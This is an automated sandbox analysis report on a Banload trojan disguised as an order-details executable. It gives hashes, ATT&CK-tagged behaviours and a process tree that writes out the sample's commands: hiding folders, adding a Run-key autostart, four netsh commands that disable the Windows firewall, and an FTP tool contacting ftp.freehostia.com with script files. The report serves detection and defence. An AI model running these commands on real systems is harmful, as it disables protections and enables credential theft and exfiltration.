banload | 1761f7de2e6b4f406c6775556927bc7338f5b9100ebe42b4f24a528da0657e1d

Analysis

max time kernel
141s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30-08-2024 13:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Order details 20160626122950.exe
Size

2.4MB
MD5

589fe039b5bd931e41708b69c0f76953
SHA1

b467a742647a2b703c0ca8afe9d7088f6dbf26dd
SHA256

f025f44a5c3ac7030a7be24668639025ff7b14d4db019a9b5b041ccf98eaac2e
SHA512

ce1fbaecee820f32ac60d05f0dceabcc33d743058618df1e6898eaf81558344e821812827ef3cc875e8234a3f5cf8a04d2b886c2c6407b850112f3b7abc0ef42
SSDEEP

49152:ItUMENJXfggCMoWBfzMH8fhNw9pZJf27QWqxmnMThUCWeoVoYA5+jCUq:ItsJPCMDfesNwfZJyqMGNeVPA5+jCr

Score

10^/10

banload collection credential_access discovery downloader dropper evasion persistence privilege_escalation spyware stealer trojan

Malware Config

Signatures

Banload
Banload variants download malicious files, then install and execute the files.
trojan dropper downloader banload
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

adbr02.exeadbr01.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr02.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr01.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
3652	netsh.exe
3828	netsh.exe
3096	netsh.exe
4448	netsh.exe

Sets file to hidden 1 TTPs 5 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
4892	attrib.exe
2208	attrib.exe
2784	attrib.exe
816	attrib.exe
2708	attrib.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

adbr01.exeadbr02.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr01.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exeOrder details 20160626122950.exeWScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	Order details 20160626122950.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 7 IoCs

Processes:

Adobeta.exeadbr01.exeadbr01.exeadbr02.exeadbr02.exeAdobeta.exeAReader.exe

pid	Process
4308	Adobeta.exe
4032	adbr01.exe
904	adbr01.exe
2040	adbr02.exe
4504	adbr02.exe
3284	Adobeta.exe
3232	AReader.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

adbr02.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	adbr02.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Order details 20160626122950.exeWScript.exeattrib.exeWScript.execmd.exeAdobeta.exenetsh.exenetsh.exeattrib.exeadbr01.exeadbr02.exenetsh.exexcopy.exeattrib.exereg.exeipconfig.exeAReader.execmd.exeattrib.exeattrib.exeadbr01.exeadbr02.exenetsh.exeAdobeta.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Order details 20160626122950.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AReader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exe

pid	Process
2728	ipconfig.exe

Modifies registry class 11 IoCs

Processes:

adbr01.exeOrder details 20160626122950.execmd.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\RuntimeVersion = "v2.0.50727"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\15.0.0.0\RuntimeVersion = "v2.0.50727"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Assembly = "Microsoft.Vbe.Interop, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Class = "Microsoft.Vbe.Interop.VBProjectClass"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\15.0.0.0	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\15.0.0.0\Assembly = "Microsoft.Vbe.Interop, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C"	adbr01.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	Order details 20160626122950.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\15.0.0.0\Class = "Microsoft.Vbe.Interop.VBProjectClass"	adbr01.exe

NTFS ADS 3 IoCs

Processes:

adbr01.exeadbr02.exe

description	ioc	Process
File created	C:\ProgramData\TEMP:663565B1	adbr01.exe
File opened for modification	C:\ProgramData\TEMP:663565B1	adbr01.exe
File opened for modification	C:\ProgramData\TEMP:663565B1	adbr02.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

adbr01.exeadbr02.exe

description	pid	Process
Token: 33	904	adbr01.exe
Token: SeIncBasePriorityPrivilege	904	adbr01.exe
Token: 33	904	adbr01.exe
Token: SeIncBasePriorityPrivilege	904	adbr01.exe
Token: SeDebugPrivilege	904	adbr01.exe
Token: 33	4504	adbr02.exe
Token: SeIncBasePriorityPrivilege	4504	adbr02.exe
Token: 33	4504	adbr02.exe
Token: SeIncBasePriorityPrivilege	4504	adbr02.exe
Token: SeDebugPrivilege	4504	adbr02.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Order details 20160626122950.exeWScript.execmd.exeWScript.execmd.exeadbr01.exe

description	pid	Process	procid_target
PID 2080 wrote to memory of 2288	2080	Order details 20160626122950.exe	93
PID 2080 wrote to memory of 2288	2080	Order details 20160626122950.exe	93
PID 2080 wrote to memory of 2288	2080	Order details 20160626122950.exe	93
PID 2288 wrote to memory of 548	2288	WScript.exe	95
PID 2288 wrote to memory of 548	2288	WScript.exe	95
PID 2288 wrote to memory of 548	2288	WScript.exe	95
PID 548 wrote to memory of 1084	548	cmd.exe	102
PID 548 wrote to memory of 1084	548	cmd.exe	102
PID 548 wrote to memory of 1084	548	cmd.exe	102
PID 548 wrote to memory of 2784	548	cmd.exe	104
PID 548 wrote to memory of 2784	548	cmd.exe	104
PID 548 wrote to memory of 2784	548	cmd.exe	104
PID 548 wrote to memory of 2208	548	cmd.exe	105
PID 548 wrote to memory of 2208	548	cmd.exe	105
PID 548 wrote to memory of 2208	548	cmd.exe	105
PID 548 wrote to memory of 816	548	cmd.exe	106
PID 548 wrote to memory of 816	548	cmd.exe	106
PID 548 wrote to memory of 816	548	cmd.exe	106
PID 548 wrote to memory of 4892	548	cmd.exe	107
PID 548 wrote to memory of 4892	548	cmd.exe	107
PID 548 wrote to memory of 4892	548	cmd.exe	107
PID 548 wrote to memory of 2708	548	cmd.exe	108
PID 548 wrote to memory of 2708	548	cmd.exe	108
PID 548 wrote to memory of 2708	548	cmd.exe	108
PID 548 wrote to memory of 4472	548	cmd.exe	109
PID 548 wrote to memory of 4472	548	cmd.exe	109
PID 548 wrote to memory of 4472	548	cmd.exe	109
PID 4472 wrote to memory of 3548	4472	WScript.exe	110
PID 4472 wrote to memory of 3548	4472	WScript.exe	110
PID 4472 wrote to memory of 3548	4472	WScript.exe	110
PID 3548 wrote to memory of 4308	3548	cmd.exe	112
PID 3548 wrote to memory of 4308	3548	cmd.exe	112
PID 3548 wrote to memory of 4308	3548	cmd.exe	112
PID 3548 wrote to memory of 2960	3548	cmd.exe	113
PID 3548 wrote to memory of 2960	3548	cmd.exe	113
PID 3548 wrote to memory of 2960	3548	cmd.exe	113
PID 3548 wrote to memory of 2728	3548	cmd.exe	114
PID 3548 wrote to memory of 2728	3548	cmd.exe	114
PID 3548 wrote to memory of 2728	3548	cmd.exe	114
PID 3548 wrote to memory of 4032	3548	cmd.exe	115
PID 3548 wrote to memory of 4032	3548	cmd.exe	115
PID 3548 wrote to memory of 4032	3548	cmd.exe	115
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116
PID 4032 wrote to memory of 904	4032	adbr01.exe	116

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
4892	attrib.exe
2208	attrib.exe
2784	attrib.exe
816	attrib.exe
2708	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2080
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:1084
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2784
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2208
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:816
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4892
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2708
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4472
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3548
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4308
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2960
      - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /all
        6⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:2728
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4032
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:904
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2040
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4504
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall set opmode disable
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3652
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set currentprofile state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3828
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set profiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3096
      - C:\Windows\SysWOW64\netsh.exe
        
        NetSh Advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4448
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3284
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
        
        AReader 5400
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=2708,i,8231329449558834090,4540802069600791165,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:8
1⤵
PID:3428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Licenses\086A4C8982A52E70F.Lic

Filesize
140B

MD5
1ea025efbb8f8a83b58bf7d8c112e9fc

SHA1
c80159a063f58672933a04e44a4fde78badfd6e3

SHA256
63c99490e9d7a0e7b2d7746ebbbcf2e39816ce979b31b0c90969eed58aff2b0e

SHA512
7aee4cfcf3a9eba23076feb73bf04af88d8de25565d4578b96608232cf63fd0df65a85a3ccd349b5622e7a5e6151cd727004073277a74b11f3bfc335cad14830

Download Submit
C:\ProgramData\TEMP:663565B1

Filesize
140B

MD5
d504b2b6bffa48fc5c7a07ba9a86243d

SHA1
869e88950fa6a28379493a31982d73bacc154898

SHA256
3db629b989735cf189b5b60acb57fb355f0a9b0ae348a514c85934274acc2463

SHA512
08ee63d2462ad3f4239e20af4c815ace67dec8302d170def0e1a671b758f28cbff6a5c1758d9792030546dfd5d07e60821d295a37a9b3263b5c3af0a458867c4

Download Submit
C:\ProgramData\TEMP\RAIDTest

Filesize
4B

MD5
c2f09542b6c7daf4288f3524c8cebb18

SHA1
9430b21baf07f0d105b9ee5fdd9f868418454517

SHA256
55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4

SHA512
dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq

Filesize
118B

MD5
8e6e9290ff877feff5541cec9023f670

SHA1
64af5a9d7740c1dfc9407fcc14e1e6c5484ceffd

SHA256
503b2f2582bf2efb3d9cd446648819814037e6c7d88bb178d178048dd42dacc7

SHA512
03f85e8efc7d73f3b3eb2e6c45bf6056f4e8a2ccb1a99f83656bca1cb0b3b6a1685846b760f88e90ec9c8ce8c08571742adfd3694b9f3cc1ab002e22117c8193

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe

Filesize
124KB

MD5
1a1075e5e307f3a4b8527110a51ce827

SHA1
f453838ed21020b7ca059244feea8579e5aa74ef

SHA256
ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5

SHA512
b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat

Filesize
556B

MD5
97410477dc9501dffca4ea4b1ae57273

SHA1
fb573b3bf4eba734b0f32db1a5b7ff78de36b064

SHA256
3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c

SHA512
3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs

Filesize
186B

MD5
09082253605a7171f078e26dc308a667

SHA1
585286c9fcda5e66e7fdb4e17a7bab6160183d46

SHA256
f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed

SHA512
adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs

Filesize
189B

MD5
ce8041824149d8266dbb0ad9688224d7

SHA1
3ab653c43ce66681ceaab90193e1a4c95d998090

SHA256
0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5

SHA512
e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe

Filesize
256KB

MD5
97b8dbcc7b3cc290aef4241df911ac2e

SHA1
733ababbcd278821d4e3ee78580841981f26642e

SHA256
c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023

SHA512
